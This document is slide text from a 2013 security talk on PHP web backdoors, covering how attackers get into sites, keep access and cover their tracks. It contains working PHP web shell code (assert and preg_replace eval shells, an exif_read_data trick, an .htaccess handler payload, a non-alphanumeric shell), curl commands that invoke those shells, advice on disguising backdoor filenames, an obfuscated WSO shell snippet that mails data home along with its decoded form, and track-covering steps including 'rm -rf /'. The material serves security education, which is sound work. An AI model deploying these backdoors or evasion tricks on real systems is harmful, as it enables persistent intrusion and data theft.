Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
3. Overview
★ Anatomy of (PHP) Web Hacking
★ Maintaining Access
★ Techniques
★ Covering Tracks
★ Case Studies
★ Detect / Clean up
4. How we put web backdoor?
High Risk
Medium Risk
Low Risk
OWASP Top Ten 2013
A1-Injection
A2-Broken Authentication and Session Management
A3-Cross-Site Scripting (XSS)
A4-Insecure Direct Object References
A5-Security Misconfiguration
A6-Sensitive Data Exposure
A7-Missing Function Level Access Control
A8-Cross-Site Request Forgery (CSRF)
A9-Using Components with Known Vulnerabilities
A10-Unvalidated Redirects and Forwards
5. Public CMS/Plugins PWN
1. Vulnerability Assessment and Mapping
★ Vulnerable version ? Vulnerability exists ?
★ Conditions match ? / Known limitations
2. Exploitation
★ Public exploit available?
2.1 Yes - Just use it
★ Review & test
2.2 No - Source code analysis
★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/
★ Issue tracker (SVN/GIT repo.)
★ Public / private vulnerability discussion
3. Zero-Day - for l33t h4x0r!
★ Source code analysis without patch, valuable!
6. Joomla! - Unauthorised Uploads
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4
Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
Vulnerable files
1. libraries/joomla/filesystem/file.
php
2.
administrator/components/com_m
edia/helpers/media.php
Scenario
1. Joomla! <= 2.5.13
2. User with author privilege
3. OS = Windows Machine
or misconfigured Apache + Linux
Bypassing File
Upload Restrictions
in Joomla!
11. Case Study - Official Ubuntu Forums
http://www.ubuntuforums.org/
★ Hacked on 14 July 2013, Defaced on 20 July 2013
★ 1.82 million users’ data leaked
★ Attacker had full access on Forums app servers
★ Servers running latest version of vBulletin
What happened (posted in Canonical Blog)
● A moderator account was hacked
● Attacker post XSS to forum and sent to admin
● 31 seconds .. admin account was PWNED
12. IPB - Bad Sanitization
Invision Power Board <= 3.4.4
Released on : 2013/05/13 by @johnjean
Logical Vulnerability + Bad Sanitization
1. Create new user using ..
admin@email.com+[150 spaces]+A
2. MySQL Limitation!
string exceeding 150 characters are truncated
and value will be trim to cause arbitrary user
have same email as admin and change admin pass!
13. Other factors
3rd party components
★ uploadify, ckeditor, ckfinder, tinymce, openx
Shared Hosting Security
★ Exposed Session Data
★ Improper user privileges
(OS/Code execution, critical file manipulation)
★ Vulnerable services (SSH, FTP etc.)
MITM, Insider attack, lack of physical
access control etc.
14. Maintaining Access
Add arbitrary accounts (*nix shadow, AD etc.)
Reverse Shell and/or Bind Shell using ...
★ Binary/Script Backdoor
1. Bind Port to *nix shell
2. Send *nix shell back to attacker
3. Make a relay tunnel
4. Hidden trigger to spawn shell
★ Web Backdoor - Use less privileged!
Connect via HTTP Methods & Headers (GET/POST etc.)
19. Code Evaluation besides eval()
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with -e modifier (deprecated in PHP 5.5.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. OS command executions , check out this link!
http://stackoverflow.com/questions/3115559/exploitable-php-functions
20. Stupid trick! but it’s work!
★ GNU license in beginning of a PHP file!
/* Copyright (C) 1991 Free Software Foundation, Inc.
This file is part of the GNU C Library.
…
*/ <?php ...
★ PGP Public Key !?
/* -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
...
*/ <?php …
★ Software license PROHIBIT to decode
★ More creative filename!
○ lndex.php
○ 1ndex.php
○ index2.php
○ wp-manual.php
○ cat.jpg.php
○ license.txt
○ README.md
○ .bash_profile
21. PHP: exif_read_data()
1. Create exif meta-data using exiftool
$ exiftool 2600.jpg -Software=system
$ exiftool 2600.jpg -Model=id
2. Put 2600.jpg along with backdoor
$A = exif_read_data('2600.jpg');
$A['Software']($A['Model']);
3. Browse to backdoor and boom!
uid=33(www-data) gid=33(www-data)
groups=33(www-data)
22. .htaccess + any file format
1. Apache Configuration
AllowOverride All
2. .htaccess
<FilesMatch "2600.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
3. 2600.jpg
<?php @system($_POST["cmd"]); ?>
26. non-alphabet PHP shell
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters,
it might not work if you copy & paste! ***
27. Common survivor feature!
work for various type of OS (win/linux/osx ) and ISO ??
find writable directory
read/write file
merge into every files
merge into backup db / files / zip
reverse/bind php shell
database client
File management (symlink?)
av/ids/ips/waf detect
credential dumper
os command
network scanner
TCP/UDP/HTTP/DNS Amp flood
SOCKS Proxy for pivoting
HTTP proxy, IRC connect back
etc.
29. Free Kiddies Backdoor!
c99
r57
wso
icfdkshell
weevely
ASPsh
msfpayload
use at your own risk!
Caution!
There are many cases that backdoor
served inside another backdoor *w*)a
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.
zip
$x10="x6dai154";$x0b=$_SERVER
["x53x45RVE122_x4eAMx45"].$_SERVER
["123103x52Ix50x54_116101115E"];$x0c="
141r162a171040".$x0b;$x0d=array("143x61","x6cx69","
146x77162151x74x65","100","vx65x2e");$x0e=$x0d[2].$x0d
[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail(“fwrite@live.ca”,”target/backdoor.php”,”target/backdoor.php”);
30. Covering Tracks
★ root?
★ logs e.g. /var/log/*
★ history e.g. ~/.bash_history
★ self-destruction
★ rm -rf /